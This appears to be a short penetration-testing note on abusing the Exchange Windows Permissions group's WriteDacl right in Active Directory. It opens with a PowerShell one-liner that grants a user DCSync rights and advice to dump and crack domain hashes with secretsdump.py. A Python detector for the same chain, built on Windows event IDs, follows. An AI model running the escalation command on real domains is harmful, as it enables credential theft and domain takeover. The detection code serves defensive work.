The Exchange Windows Permissions group has the WriteDacl permission, which allows its members to modify the DACL (Discretionary Access Control List). This allows the user to grant any privilege on the object.
First, you must be authenticated to the DC with the proper permissions.
One-liner to grant Exchange Windows Permissions:
Add-DomainGroupMember -Identity 'Exchange Windows Permissions' -Members <username>; $username = "<domain>\<username>"; $password = "<password>"; $secstr = New-Object -TypeName System.Security.SecureString; $password.ToCharArray() | ForEach-Object {$secstr.AppendChar($_)}; $cred = new-object -typename System.Management.Automation.PSCredential -argumentlist $username, $secstr; Add-DomainObjectAcl -Credential $Cred -PrincipalIdentity '<username>' -TargetIdentity '<domain>.local\Domain Admins' -Rights DCSync
Once permissions are obtained, use secretsdump.py to dump the hashes, which can be cracked offline.
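A detection-side view of the chain above, as an added example that is not part of the original notes: it correlates Windows Security events 4756 (member added to a universal group), 5136 (directory object modified) and 4662 (operation on an object) per account SID. The sample events are constructed, and the `stage`/`correlate` helpers, the one-hour window and the `allow` parameter (for accounts that replicate legitimately, such as directory sync services) are assumptions for illustration.

```python
from datetime import datetime, timedelta

REPL_GUIDS = (
    "1131f6aa-9c07-11d1-f79f-00c04fc2dcd2",  # DS-Replication-Get-Changes
    "1131f6ad-9c07-11d1-f79f-00c04fc2dcd2",  # DS-Replication-Get-Changes-All
)
ORDER = ["group_add", "dacl_write", "replication"]

def stage(ev, group="Exchange Windows Permissions"):
    """Return (stage, acting SID) for an event in the chain, else (None, None)."""
    eid = ev["EventID"]
    if eid == 4756 and ev["TargetUserName"] == group:
        return "group_add", ev["MemberSid"]
    if eid == 5136 and ev["AttributeLDAPDisplayName"].lower() == "ntsecuritydescriptor":
        return "dacl_write", ev["SubjectUserSid"]
    if eid == 4662 and not ev["SubjectUserName"].endswith("$"):  # skip DC machine accounts
        if any(g in ev["Properties"].lower() for g in REPL_GUIDS):
            return "replication", ev["SubjectUserSid"]
    return None, None

def correlate(events, window=timedelta(hours=1), allow=()):
    """Flag user accounts requesting replication; attach earlier stages seen within `window`."""
    progress, findings = {}, {}
    for ev in sorted(events, key=lambda e: e["Time"]):
        name, sid = stage(ev)
        if name is None or sid in allow:
            continue
        # Keep only stages recent enough to belong to the same activity burst.
        seen = [(s, t) for s, t in progress.get(sid, []) if ev["Time"] - t <= window]
        if name not in [s for s, _ in seen]:
            seen.append((name, ev["Time"]))
        progress[sid] = seen
        got = [s for s, _ in seen]
        if "replication" in got:
            findings[sid] = {"stages": got, "full_chain": got == ORDER}
    return findings

T = datetime.fromisoformat
USER, DC = "S-1-5-21-1-2-3-1105", "S-1-5-21-1-2-3-1000"  # constructed SIDs
SAMPLE = [  # constructed events; field names follow the Security log, values are made up
    {"EventID": 4756, "Time": T("2024-05-01T10:00:00"), "TargetUserName": "Exchange Windows Permissions", "MemberSid": USER},
    {"EventID": 5136, "Time": T("2024-05-01T10:02:00"), "AttributeLDAPDisplayName": "nTSecurityDescriptor", "SubjectUserSid": USER},
    {"EventID": 4662, "Time": T("2024-05-01T10:05:00"), "SubjectUserName": "jdoe", "SubjectUserSid": USER, "Properties": "{1131F6AD-9C07-11D1-F79F-00C04FC2DCD2}"},
    {"EventID": 4662, "Time": T("2024-05-01T10:06:00"), "SubjectUserName": "DC01$", "SubjectUserSid": DC, "Properties": "{1131f6aa-9c07-11d1-f79f-00c04fc2dcd2}"},
]

if __name__ == "__main__":
    print(correlate(SAMPLE))
```

Events 5136 and 4662 are only logged when directory service auditing and a matching SACL are configured on the objects involved, so an empty result does not by itself show the chain did not occur.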